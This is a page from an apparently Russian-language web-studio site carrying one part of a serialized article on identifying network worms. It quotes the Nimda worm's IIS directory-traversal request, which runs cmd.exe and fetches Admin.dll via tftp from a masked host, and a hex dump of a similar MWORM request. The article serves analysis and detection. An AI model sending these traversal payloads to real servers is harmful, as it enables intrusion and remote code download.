Разработка динамических сайтов
SEO услуги
Управление контекстной рекламой

Вход на хостинг

Имя пользователя:*

Пароль пользователя:*

IT-новости

20.04.2016 iPhone 2017 года поместят в водонепроницаемый корпус из стекла

Линейка iPhone в новом году серьезно поменяется. В этом уверен аналитический исследователь Мин Чи Ку......

подробнее

30.07.2015 Ищем уникальный контент для сайта

Ищем уникальный контент для сайта Без уникального контента Ваш сайт обречен на то, что его страницы......

подробнее

11.05.2015 Распространённые ошибки разработчиков сайтов

Не секрет, что в сети Интернет насчитывается миллионы сайтов, и каждый день появляются тысячси новых......

подробнее

Content- type: text/ xml,

Content- length: 3379

 

Листинг 5. Голова червя Nimda

 

GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/

c+tftp%20-i%20XXX.XXX.XXX.XXX%20GET%20Admin.dll%20c:Admin.dll

Если червь содержит в себе незашифрованные текстовые строки (а многие из червей устроены именно так!), то злобный характер его натуры распознается уже при беглом просмотре HEX-кода исследуемого файла:

Листинг 6. Фрагмент вируса MWORM

 

00005FA0:  47 45 54 20 2F 73 63 72 │ 69 70 74 73 2F 2E 2E 25   GET /scripts/..%

00005FB0:  63 31 25 31 63 2E 2E 2F │ 77 69 6E 6E 74 2F 73 79   c1%1c../winnt/sy

00005FC0:  73 74 65 6D 33 32 2F 63 │ 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/

00005FD0:  63 2B 63 6F 70 79 25 32 │ 30 63 3A 5C 77 69 6E 6E   c+copy%20c:winn

00005FE0:  74 5C 73 79 73 74 65 6D │ 33 32 5C 63 6D 64 2E 65   tsystem32cmd.e

00005FF0:  78 65 25 32 30 63 3A 5C │ 4D 77 6F 72 6D 2E 65 78   xe%20c:Mworm.ex

00006000:  65 20 48 54 54 50 2F 31 │ 2E 30 0D 0A 0D 0A 00 00   e HTTP/1.0♪◙♪◙

Некоторые черви в целях уменьшения своих размеров и не в последнюю очередь маскировки, сжимаются тем или иным упаковщиком исполняемых программ, и перед анализом их необходимо распаковать.

Листинг 7. Фрагмент вируса Love San после распаковки

 


Предыдущая страницаОглавлениеСледующая страница
 
[001] [002] [003] [004] [005] [006] [007] [008] [009] [010] [011] [012] [013] [014] [015] [016] [017] [018] [019] [020]
[021] [022] [023] [024] [025] [026] [027] [028] [029] [030] [031] [032] [033] [034] [035] [036] [037] [038] [039] [040]
[041] [042] [043] [044] [045] [046] [047] [048] [049] [050] [051] [052] [053] [054] [055] [056] [057] [058] [059] [060]
[061] [062] [063] [064] [065] [066] [067] [068] [069] [070] [071] [072] [073] [074] [075] [076] [077] [078] [079] [080]
[081] [082] [083] [084] [085] [086] [087] [088] [089] [090] [091] [092] [093] [094] [095] [096] [097] [098] [099] [100]
[101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111] [112] [113] [114] [115] [116] [117] [118] [119] [120]
[121] [122] [123] [124] [125] [126] [127] [128] [129] [130] [131] [132] [133] [134] [135] [136] [137] [138] [139] [140]
[141] [142] [143] [144] [145] [146] [147] [148]

+7 (831) 413-63-27
ООО Дельта-Технология ©2007 - 2016 год
Нижний Новгород, ул. Дальняя, 17А.
Rambler's Top100